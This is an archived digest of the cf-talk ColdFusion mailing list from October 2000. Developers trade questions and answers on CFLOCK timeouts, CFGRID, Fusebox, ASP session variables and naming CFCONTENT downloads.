  Issac Rosa
  
  IT - National Sales  Marketing
  OLAP Specialist Team Leader
  Ofc: 407-514-5021
  Cell: 407-342-0644
  Fax: 407-514-5988
  [EMAIL PROTECTED]
  
 --
 --
 Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
 Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists 
 or send a message with 'unsubscribe' in the body to 
 [EMAIL PROTECTED]


Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebarRsts or send a message with 
'unsubscribe' in the body to [EMAIL PROTECTED]



RE: CFLOCK HELLLLPPPP

2000-10-20 Thread Dave Watts

 Hi all. Sorry about another cflock question, but using it 
 has stopped our system cold.
 
 Our system: CF v4.1 on NT integrating with ESRI ArcIMS and 
 using SYBASE IQ12 on UNIX for our datawarehouse. In ArcIMS, 
 the screen is divided into frames and and the CF comes on 
 in one of the frames. I put a CFLOCK around a set of session 
 variables. See code below. Then I have an SQL statement using 
 the session.variables and put a CFLOCK around this too. Now, 
 I have to say that it takes forever to get a query back (2 or 
 more minutes) but I have no control over the IQ server and 
 once I added the CFLOCK it came back with "Timed out while
 waiting to obtain exclusive lock." and stopped everything 
 cold. To get it working again, we have to reboot our CF 
 server. If we put a THROWTIMEOUT= "No" it will continue to 
 process but we need those session variables for the query
 that follows.
 
 If I am to use CFLOCK how can I do it without locking our 
 whole system?

I've never seen CFLOCK cause the server to need to be cycled!

There are a couple of things you might look at.

In your query, are you writing to session variables, or simply reading them?
If you're just reading them, you don't need an exclusive lock. You might
also, in that case, cast the variables to a local scope within a lock before
the query, then reference the local variables instead.

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
voice: (202) 797-5496
fax: (202) 797-5444

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



can't open for reading or corrupted error

2000-10-20 Thread stew

Hello,

We are currently having to restart our IIS server every couple of hours to fix a CF 
problem.  We believe it is a CF problem because static sites continue to work however 
CF sites will not work.  Below is the error message that we get from CF.

Error Occurred While Processing Request
Error Diagnostic Information Cannot load template file
\\HOST\Directory\RECORD_CHARITIES.CFM
The template file exists, however, it either cannot be opened for reading,
or it is encrypted and its data has been corrupted The error occurred while
processing an element with a general identifier of (CFINCLUDE), occupying
document position (17:3) to (17:172). Date/Time: 10/11/00 10:50:08 Browser:
Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt) Remote Address:
143.61.15.253 HTTP Referer:

The problem is not every hit to a page.  This happens over time, and not always from 
the same page.  After this error CF no longer serves pages.

Any help with this would be much appreciated.  I have done searches on numerous CF  
IIS sites to no avail.

TIA,
Terry Stewart







Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



RE: Weirdest Access problem ever

2000-10-20 Thread Robert Everland

Sorry I was using that as an example, it was actually this
left(problemlog.description, 40) AS ResultField5, now what else could it be.

Robert Everland III
Web Developer
Dixon Ticonderoga


-Original Message-
From: Chapman, Katrina [mailto:[EMAIL PROTECTED]]
Sent: Friday, October 20, 2000 2:01 PM
To: CF-Talk
Subject: RE: Weirdest Access problem ever


You should rename the field desc as that is a reserved word and your ODBC
connection may be choking on it.  Try naming it something like description.
I know it's more typing but you'll have fewer headaches.  BTW this should
also fix your problem.

--K

-Original Message-
From: Robert Everland [mailto:[EMAIL PROTECTED]]
Sent: Friday, October 20, 2000 10:05 AM
To: CF-Talk
Subject: Wierdest Access problem ever


Alright here is what happened. I had a query that was working
perfectly for sometime. It basically did this
Select left(desc,40)
From Here
Where 1=1

What happened was the left function completely screwed the query. Has anyone
had this problem before? I thought access supported this function, was it a
fluke as to why it was working before? I took it out and put it in CF to do
it, but I am sure it would be just a little faster if Access was doing it.

Robert Everland III
Web Developer
Dixon Ticonderoga


Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a
message with 'unsubscribe' in the body to [EMAIL PROTECTED]


Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a
message with 'unsubscribe' in the body to [EMAIL PROTECTED]

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



Re: Selects in CFGRID

2000-10-20 Thread John Allred

Aw, c'mon. Someone's bound to have some thoughts on this.
Please?

John Allred wrote:
 
 I have four books open in front of me, and I've been
 searching for an answer all morning. Is there a way to
 insert values in a CFGRID field by selecting values from a
 column from another query? What I'm looking for is the same
 functionality as you'd get from an HTML SELECT field where
 you populate it with a query.
 
 Thanks,
 --John
 

 Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
 Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]

-- 
John Allred / Jackson, Mississippi
mailto:[EMAIL PROTECTED] 
 --
  "Wealth, like happiness, is never attained when sought
after directly. 
It comes as a by-product of providing a useful service"
   

-- Henry Ford
 --

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



RE: Selects in CFGRID

2000-10-20 Thread Simon Horwith

let me get this straight:  you want to know how to create a CFGRID with one
query, and populate some of it's cell values with results from another
query?  I'm just trying to make sure I understand the question, before I
answer.

~Simon

-Original Message-
From: John Allred [mailto:[EMAIL PROTECTED]]
Sent: Friday, October 20, 2000 2:11 PM
To: CF-Talk
Subject: Re: Selects in CFGRID


Aw, c'mon. Someone's bound to have some thoughts on this.
Please?

John Allred wrote:
 
 I have four books open in front of me, and I've been
 searching for an answer all morning. Is there a way to
 insert values in a CFGRID field by selecting values from a
 column from another query? What I'm looking for is the same
 functionality as you'd get from an HTML SELECT field where
 you populate it with a query.
 
 Thanks,
 --John



 Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
 Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send
a message with 'unsubscribe' in the body to
[EMAIL PROTECTED]

-- 
John Allred / Jackson, Mississippi
mailto:[EMAIL PROTECTED] 
 --
  "Wealth, like happiness, is never attained when sought
after directly. 
It comes as a by-product of providing a useful service"
 

-- Henry Ford
 --


Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a
message with 'unsubscribe' in the body to [EMAIL PROTECTED]

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



RE: fusebox style: too much disk access?

2000-10-20 Thread Nat Papovich

What-evah, Dave. Fusebox kicks ass for the very implementation you mention.
COMs can be called from a single file (using a new prefix com_filename.cfm
if you want), then whenever you need that COM, you cfinclude that file.

Maybe it would help us if you made a distinction between application logic
encapsulation and business rules encapsulation. If you do both within
COM/EJB, then you practically don't even need CF for anything other than
CFOUTPUT. If however, you want application logic in COM, but still want
business rules in CF, then Fusebox is great. No?

It seems to me that if you remove application and business logic from CF,
then a structured application architecture (like Fusebox) becomes less of a
necessity. What kind of CF architecture do you guys use in EJB/COM-heavy
apps?

Nat Papovich
ICQ 32676414
"I'm for truth no matter who tells it."
-Malcolm X, 1965


-Original Message-
From: Dave Watts [mailto:[EMAIL PROTECTED]]
Sent: Friday, October 20, 2000 10:12 AM
To: CF-Talk
Cc: '[EMAIL PROTECTED]'
Subject: RE: fusebox style: too much disk access?


  I'm not a Fusebox fan, by any measure, 
 
 Why not? What would need to be changed to make you a fan?

I'd have to be working on applications where the complex logic is stored in
CF, instead of in other application tiers. I don't want to fuel another "Is
Fusebox good or bad" thread, but I don't think it fits well with the type of
applications that we focus on here at Fig Leaf, which typically have lots of
client-side complexity, like frames, JavaScript, Flash, etc. and have lots
of application logic within other application tiers on the server-side, like
within stored procedures or COM/EJB.

On the other hand, if I was working on an application with all of its
complexity within CF, I'd probably like Fusebox quite a bit. Once you move
most of that complexity from CF to other tiers, though, Fusebox doesn't do
much for you, in my opinion.

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
voice: (202) 797-5496
fax: (202) 797-5444


Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a
message with 'unsubscribe' in the body to [EMAIL PROTECTED]

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



Tele check processing using CF

2000-10-20 Thread thanh nguyen

Is there any custom tag or information about tele check payment processing 
from Verisign , please give me some suggestion
thanks

_
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com.

Share information about yourself, create your own public profile at 
http://profiles.msn.com.


Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



RE: Tele check processing using CF

2000-10-20 Thread Richard Colman

Is this the same thanh nguyen that I know??? If not, please excuse the
contact.

Richard Colman
Director of Computing
School of Biological Sciences
http://www.bio.uci.edu
http://comp.bio.uci.edu
[EMAIL PROTECTED]  949-824-8955
mobile: 949-275-4311

-Original Message-
From: thanh nguyen [mailto:[EMAIL PROTECTED]]
Sent: Friday, October 20, 2000 11:20 AM
To: CF-Talk
Subject: Tele check processing using CF


Is there any custom tag or information about tele check payment processing
from Verisign , please give me some suggestion
thanks

_
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com.

Share information about yourself, create your own public profile at
http://profiles.msn.com.



Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a
message with 'unsubscribe' in the body to [EMAIL PROTECTED]


Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



OT setting form variables in asp

2000-10-20 Thread Gavin Myers

hah, i have the pleasure of mudding up some asp code on this site

if i have this:

form.cfm
form action = "form_submit.asp"
input type = "hidden" name = "formid" value = 6"
/form


form_submit.asp
!--- how do i say this in asp ---
Session("COLL_FORM_ID") = "#form.formid#"


thanks,
Gavin

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



CFCONTENT download name

2000-10-20 Thread Warrick, Mark

I'm trying to create an MS Word doc based upon a query and information entered on a 
form preceeding this report processing template.

In the processing template I've tried using:
cfcontent type="application/msword"

The query runs, but all the information I entered in the form preceeding it is lost.

I've tried using:
cfcontent type="application/rtf"

This works. The query data and all the info from the preceeding form are there, and a 
download prompt comes up in the browser.

HOWEVER, the initial filename in the download prompt is the name of the CFML template 
which processed it (reports.cfm).

I want the name of the file that shows up in that download prompt to be report.doc so 
that the user won't have to think about about naming the file correctly when they 
select a place to save it.

I've tried the technique suggested by Borkman Lee:
http://servername/cfdocs/index.cfm/xyz.doc?fuseaction=showWordDoc

It doesn't work on my server.

Does anyone else know how to do this? 

Please copy me on your reply as the list sometimes take a few hours to send messages 
to me.

Thanks!

OH, and by the way - the first person to answer this correctly is going to get 2 free 
movie tickets.

--
Mark Warrick
Phone: (714) 547-5386
Efax.com Fax: (801) 730-7289
Personal Email: [EMAIL PROTECTED]
Personal URL: http://www.warrick.net 
Business Email: [EMAIL PROTECTED]
Business URL: http://www.fusioneers.com
ICQ: 346566
--


Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebarRsts or send a message with 
'unsubscribe' in the body to [EMAIL PROTECTED]



New Virus,

2000-10-20 Thread Will Ryan

Beware of latest visual basic worm, UOEOGO.  One of our "Sales" folks got
hit.

Beware!
 Will


Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



RE: Tele check processing using CF

2000-10-20 Thread Richard Colman

darn. did it again. sorry to broadcast this to the list.

-Original Message-
From: Richard Colman [mailto:[EMAIL PROTECTED]]
Sent: Friday, October 20, 2000 11:21 AM
To: CF-Talk
Subject: RE: Tele check processing using CF


Is this the same thanh nguyen that I know??? If not, please excuse the
contact.

Richard Colman
Director of Computing
School of Biological Sciences
http://www.bio.uci.edu
http://comp.bio.uci.edu
[EMAIL PROTECTED]  949-824-8955
mobile: 949-275-4311

-Original Message-
From: thanh nguyen [mailto:[EMAIL PROTECTED]]
Sent: Friday, October 20, 2000 11:20 AM
To: CF-Talk
Subject: Tele check processing using CF


Is there any custom tag or information about tele check payment processing
from Verisign , please give me some suggestion
thanks

_
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com.

Share information about yourself, create your own public profile at
http://profiles.msn.com.



Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a
message with 'unsubscribe' in the body to [EMAIL PROTECTED]



Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a
message with 'unsubscribe' in the body to [EMAIL PROTECTED]


Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



Re: Selects in CFGRID

2000-10-20 Thread John Allred

Simon,

Yeah. Just like you would do with SELECT or CFSELECT, as in:

SELECT NAME="DeptAbbrev"
cfoutput query="departments"
option
value=#abbrev##trim(dept)#/option/cfoutput/select

I can't find anything to indicate something like this is
possible. I guess maybe the question is whether you can nest
a SELECT field within a CFGRID.

Thanks,
--John

Simon Horwith wrote:
 
 let me get this straight:  you want to know how to create a CFGRID with one
 query, and populate some of it's cell values with results from another
 query?  I'm just trying to make sure I understand the question, before I
 answer.
 
 ~Simon


Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



RE: OT setting form variables in asp

2000-10-20 Thread Garza, Jeff

I beleive what you are trying to accomplish is this:

% 
Session("COLL_FORM_ID") = Request.form("id")
%

No?

Jeff Garza
Web Developer
Spectrum Astro, Inc.
480-892-8200

[EMAIL PROTECTED]
http://www.spectrumastro.com



-Original Message-
From: Gavin Myers [mailto:[EMAIL PROTECTED]]
Sent: Friday, October 20, 2000 11:32 AM
To: CF-Talk
Subject: OT setting form variables in asp


hah, i have the pleasure of mudding up some asp code on this site

if i have this:

form.cfm
form action = "form_submit.asp"
input type = "hidden" name = "formid" value = 6"
/form


form_submit.asp
!--- how do i say this in asp ---
Session("COLL_FORM_ID") = "#form.formid#"


thanks,
Gavin


Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a
message with 'unsubscribe' in the body to [EMAIL PROTECTED]

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



Re: CFCONTENT download name

2000-10-20 Thread tom muck

Use this before your CFCONTENT tag:

CFHEADER NAME="Content-Disposition" VALUE="inline; filename=myworddoc.doc"

tom


- Original Message -
From: "Warrick, Mark" [EMAIL PROTECTED]
To: "CF-Talk" [EMAIL PROTECTED]
Sent: Friday, October 20, 2000 2:32 PM
Subject: CFCONTENT download name


I'm trying to create an MS Word doc based upon a query and information entered
on a form preceeding this report processing template.

In the processing template I've tried using:
cfcontent type="application/msword"

The query runs, but all the information I entered in the form preceeding it is
lost.

I've tried using:
cfcontent type="application/rtf"

This works. The query data and all the info from the preceeding form are there,
and a download prompt comes up in the browser.

HOWEVER, the initial filename in the download prompt is the name of the CFML
template which processed it (reports.cfm).

I want the name of the file that shows up in that download prompt to be
report.doc so that the user won't have to think about about naming the file
correctly when they select a place to save it.

I've tried the technique suggested by Borkman Lee:
http://servername/cfdocs/index.cfm/xyz.doc?fuseaction=showWordDoc

It doesn't work on my server.

Does anyone else know how to do this?

Please copy me on your reply as the list sometimes take a few hours to send
messages to me.

Thanks!

OH, and by the way - the first person to answer this correctly is going to get 2
free movie tickets.

--
Mark Warrick
Phone: (714) 547-5386
Efax.com Fax: (801) 730-7289
Personal Email: [EMAIL PROTECTED]
Personal URL: http://www.warrick.net
Business Email: [EMAIL PROTECTED]
Business URL: http://www.fusioneers.com
ICQ: 346566
--



Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a
message with 'unsubscribe' in the body to [EMAIL PROTECTED]


Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



RE: Output to File, a lot of white space

2000-10-20 Thread Paul Sizemore

I have tried that (also, I just tried again) - Does not work.

For example where #Q_One.brief_desc# is Air Flightposite

"CF_Capitalize#Q_One.brief_desc#/CF_Capitalize

generates

" 















Air Flightposite (if you highlight the above you can see all the spaces and
carriage returns)

-Original Message-
From: Warrick, Mark [mailto:[EMAIL PROTECTED]]
Sent: Friday, October 20, 2000 11:35 AM
To: CF-Talk
Subject: RE: Output to File, a lot of white space

Start all files with:
cfsetting enablecfoutputonly="yes"
put cf code here, surround HTML outputs with cfoutput

end all files with:
cfsetting enablecfoutputonly="no"

That will eliminate ALL the extra white space that was not generated as you
wanted it to be, and it's backwards-compatible with version 4.01.

---mark

--
Mark Warrick
Phone: (714) 547-5386
Efax.com Fax: (801) 730-7289
Personal Email: [EMAIL PROTECTED]
Personal URL: http://www.warrick.net
Business Email: [EMAIL PROTECTED]
Business URL: http://www.fusioneers.com
ICQ: 346566
--


 -Original Message-
 From: Paul Sizemore [mailto:[EMAIL PROTECTED]]
 Sent: Friday, October 20, 2000 9:15 AM
 To: CF-Talk
 Subject: Output to File, a lot of white space


 I'm writing a file to disk using the Scheduled Task's "Output to file"
 feature. And, when the file is generated on disk it has a lot of extra
 carriage returns, tabs, and spaces. The amount of extra "white"
 space looks
 a lot like the extra "white" space in my code.  In fact I deleted an extra
 carriage return in my Application.cfm, and a carriage return in
 the file was
 deleted.
 I have selected  "Suppress whitespace by default " on the server, used
 CFPROCESSINGDIRECTIVE ... , experimented with CFSetting, and
 none of them
 work (I do notice a difference with suppressing the white space).

 Paul Sizemore

 Finish Line
 3308 N Mitthoeffer Rd
 Indianapolis, IN 46235
 W: 317-899-1022 ext 3516
 --
 --
 Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
 Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists
 or send a message with 'unsubscribe' in the body to
 [EMAIL PROTECTED]



Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a
message with 'unsubscribe' in the body to [EMAIL PROTECTED]

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



RE: Selects in CFGRID

2000-10-20 Thread Simon Horwith

Oh, you want to actually nest a select within a cfgrid?  No, I do not
believe you can do this.  Possibly in a CFGRID that you are manually
creating, rather than creating from a query. 

Dave Watts you have anything to add to this?

~Simon

-Original Message-
From: John Allred [mailto:[EMAIL PROTECTED]]
Sent: Friday, October 20, 2000 2:41 PM
To: CF-Talk
Subject: Re: Selects in CFGRID


Simon,

Yeah. Just like you would do with SELECT or CFSELECT, as in:

SELECT NAME="DeptAbbrev"
cfoutput query="departments"
option
value=#abbrev##trim(dept)#/option/cfoutput/select

I can't find anything to indicate something like this is
possible. I guess maybe the question is whether you can nest
a SELECT field within a CFGRID.

Thanks,
--John

Simon Horwith wrote:
 
 let me get this straight:  you want to know how to create a CFGRID with
one
 query, and populate some of it's cell values with results from another
 query?  I'm just trying to make sure I understand the question, before I
 answer.
 
 ~Simon



Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a
message with 'unsubscribe' in the body to [EMAIL PROTECTED]

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



RE: OT setting form variables in asp -fixed-

2000-10-20 Thread Gavin Myers

that's what i needed!

thanks,

Gavin

-Original Message-
From: Garza, Jeff [mailto:[EMAIL PROTECTED]]
Sent: Friday, October 20, 2000 1:40 PM
To: CF-Talk
Subject: RE: OT setting form variables in asp


I beleive what you are trying to accomplish is this:

% 
Session("COLL_FORM_ID") = Request.form("id")
%

No?

Jeff Garza
Web Developer
Spectrum Astro, Inc.
480-892-8200

[EMAIL PROTECTED]
http://www.spectrumastro.com



-Original Message-
From: Gavin Myers [mailto:[EMAIL PROTECTED]]
Sent: Friday, October 20, 2000 11:32 AM
To: CF-Talk
Subject: OT setting form variables in asp


hah, i have the pleasure of mudding up some asp code on this site

if i have this:

form.cfm
form action = "form_submit.asp"
input type = "hidden" name = "formid" value = 6"
/form


form_submit.asp
!--- how do i say this in asp ---
Session("COLL_FORM_ID") = "#form.formid#"


thanks,
Gavin


Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a
message with 'unsubscribe' in the body to [EMAIL PROTECTED]


Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a
message with 'unsubscribe' in the body to [EMAIL PROTECTED]

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



RE: CFCONTENT download name

2000-10-20 Thread Warrick, Mark

I'm sorry.  This doesn't work.  The same problem happens - I loose all the data from 
the previous form.

---mark

--
Mark Warrick
Phone: (714) 547-5386
Efax.com Fax: (801) 730-7289
Personal Email: [EMAIL PROTECTED]
Personal URL: http://www.warrick.net 
Business Email: [EMAIL PROTECTED]
Business URL: http://www.fusioneers.com
ICQ: 346566
--


 -Original Message-
 From: tom muck [mailto:[EMAIL PROTECTED]]
 Sent: Friday, October 20, 2000 11:36 AM
 To: [EMAIL PROTECTED]
 Cc: [EMAIL PROTECTED]
 Subject: Re: CFCONTENT download name
 
 
 Use this before your CFCONTENT tag:
 
 CFHEADER NAME="Content-Disposition" VALUE="inline; 
 filename=myworddoc.doc"
 
 tom
 
 
 - Original Message -
 From: "Warrick, Mark" [EMAIL PROTECTED]
 To: "CF-Talk" [EMAIL PROTECTED]
 Sent: Friday, October 20, 2000 2:32 PM
 Subject: CFCONTENT download name
 
 
 I'm trying to create an MS Word doc based upon a query and 
 information entered
 on a form preceeding this report processing template.
 
 In the processing template I've tried using:
 cfcontent type="application/msword"
 
 The query runs, but all the information I entered in the form 
 preceeding it is
 lost.
 
 I've tried using:
 cfcontent type="application/rtf"
 
 This works. The query data and all the info from the preceeding 
 form are there,
 and a download prompt comes up in the browser.
 
 HOWEVER, the initial filename in the download prompt is the name 
 of the CFML
 template which processed it (reports.cfm).
 
 I want the name of the file that shows up in that download prompt to be
 report.doc so that the user won't have to think about about 
 naming the file
 correctly when they select a place to save it.
 
 I've tried the technique suggested by Borkman Lee:
 http://servername/cfdocs/index.cfm/xyz.doc?fuseaction=showWordDoc
 
 It doesn't work on my server.
 
 Does anyone else know how to do this?
 
 Please copy me on your reply as the list sometimes take a few 
 hours to send
 messages to me.
 
 Thanks!
 
 OH, and by the way - the first person to answer this correctly is 
 going to get 2
 free movie tickets.
 
 --
 Mark Warrick
 Phone: (714) 547-5386
 Efax.com Fax: (801) 730-7289
 Personal Email: [EMAIL PROTECTED]
 Personal URL: http://www.warrick.net
 Business Email: [EMAIL PROTECTED]
 Business URL: http://www.fusioneers.com
 ICQ: 346566
 --
 
 --
 --
 
 Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
 Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists 
 or send a
 message with 'unsubscribe' in the body to 
 [EMAIL PROTECTED]
 


Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebarRsts or send a message with 
'unsubscribe' in the body to [EMAIL PROTECTED]



RE: CFCONTENT download name

2000-10-20 Thread Nardi, Gaston

Hi,
use CFCONTENT type="application/rtf" FILE="your_file"

Good Luck,
Gastón


 -Mensaje original-
 De:   Warrick, Mark [SMTP:[EMAIL PROTECTED]]
 Enviado el:   Viernes 20 de Octubre de 2000 16:33
 Para: CF-Talk
 Asunto:   CFCONTENT download name
 
 I'm trying to create an MS Word doc based upon a query and information
 entered on a form preceeding this report processing template.
 
 In the processing template I've tried using:
 cfcontent type="application/msword"
 
 The query runs, but all the information I entered in the form preceeding
 it is lost.
 
 I've tried using:
 cfcontent type="application/rtf"
 
 This works. The query data and all the info from the preceeding form are
 there, and a download prompt comes up in the browser.
 
 HOWEVER, the initial filename in the download prompt is the name of the
 CFML template which processed it (reports.cfm).
 
 I want the name of the file that shows up in that download prompt to be
 report.doc so that the user won't have to think about about naming the
 file correctly when they select a place to save it.
 
 I've tried the technique suggested by Borkman Lee:
 http://servername/cfdocs/index.cfm/xyz.doc?fuseaction=showWordDoc
 
 It doesn't work on my server.
 
 Does anyone else know how to do this? 
 
 Please copy me on your reply as the list sometimes take a few hours to
 send messages to me.
 
 Thanks!
 
 OH, and by the way - the first person to answer this correctly is going to
 get 2 free movie tickets.
 
 --
 Mark Warrick
 Phone: (714) 547-5386
 Efax.com Fax: (801) 730-7289
 Personal Email: [EMAIL PROTECTED]
 Personal URL: http://www.warrick.net 
 Business Email: [EMAIL PROTECTED]
 Business URL: http://www.fusioneers.com
 ICQ: 346566
 --
 
 --
 --
 Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
 Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send
 a message with 'unsubscribe' in the body to
 [EMAIL PROTECTED]

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebarRsts or send a message with 
'unsubscribe' in the body to [EMAIL PROTECTED]



RE: OT setting form variables in asp

2000-10-20 Thread Garza, Jeff

Oooppps... I type faster than I read.

% 
Session("COLL_FORM_ID") = Request.form("formid")
%

Jeff Garza
Web Developer
Spectrum Astro, Inc.
480-892-8200

[EMAIL PROTECTED]
http://www.spectrumastro.com



-Original Message-
From: Garza, Jeff 
Sent: Friday, October 20, 2000 11:40 AM
To: CF-Talk
Subject: RE: OT setting form variables in asp


I beleive what you are trying to accomplish is this:

% 
Session("COLL_FORM_ID") = Request.form("id")
%

No?

Jeff Garza
Web Developer
Spectrum Astro, Inc.
480-892-8200

[EMAIL PROTECTED]
http://www.spectrumastro.com



-Original Message-
From: Gavin Myers [mailto:[EMAIL PROTECTED]]
Sent: Friday, October 20, 2000 11:32 AM
To: CF-Talk
Subject: OT setting form variables in asp


hah, i have the pleasure of mudding up some asp code on this site

if i have this:

form.cfm
form action = "form_submit.asp"
input type = "hidden" name = "formid" value = 6"
/form


form_submit.asp
!--- how do i say this in asp ---
Session("COLL_FORM_ID") = "#form.formid#"


thanks,
Gavin


Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a
message with 'unsubscribe' in the body to [EMAIL PROTECTED]


Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a
message with 'unsubscribe' in the body to [EMAIL PROTECTED]

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



RE: CFCONTENT download name

2000-10-20 Thread Warrick, Mark

Sorry.  This doesn't work.  The form variables lost.

--
Mark Warrick
Phone: (714) 547-5386
Efax.com Fax: (801) 730-7289
Personal Email: [EMAIL PROTECTED]
Personal URL: http://www.warrick.net 
Business Email: [EMAIL PROTECTED]
Business URL: http://www.fusioneers.com
ICQ: 346566
--


 -Original Message-
 From: tom muck [mailto:[EMAIL PROTECTED]]
 Sent: Friday, October 20, 2000 11:36 AM
 To: CF-Talk
 Cc: [EMAIL PROTECTED]
 Subject: Re: CFCONTENT download name
 
 
 Use this before your CFCONTENT tag:
 
 CFHEADER NAME="Content-Disposition" VALUE="inline; 
 filename=myworddoc.doc"
 
 tom
 
 
 - Original Message -
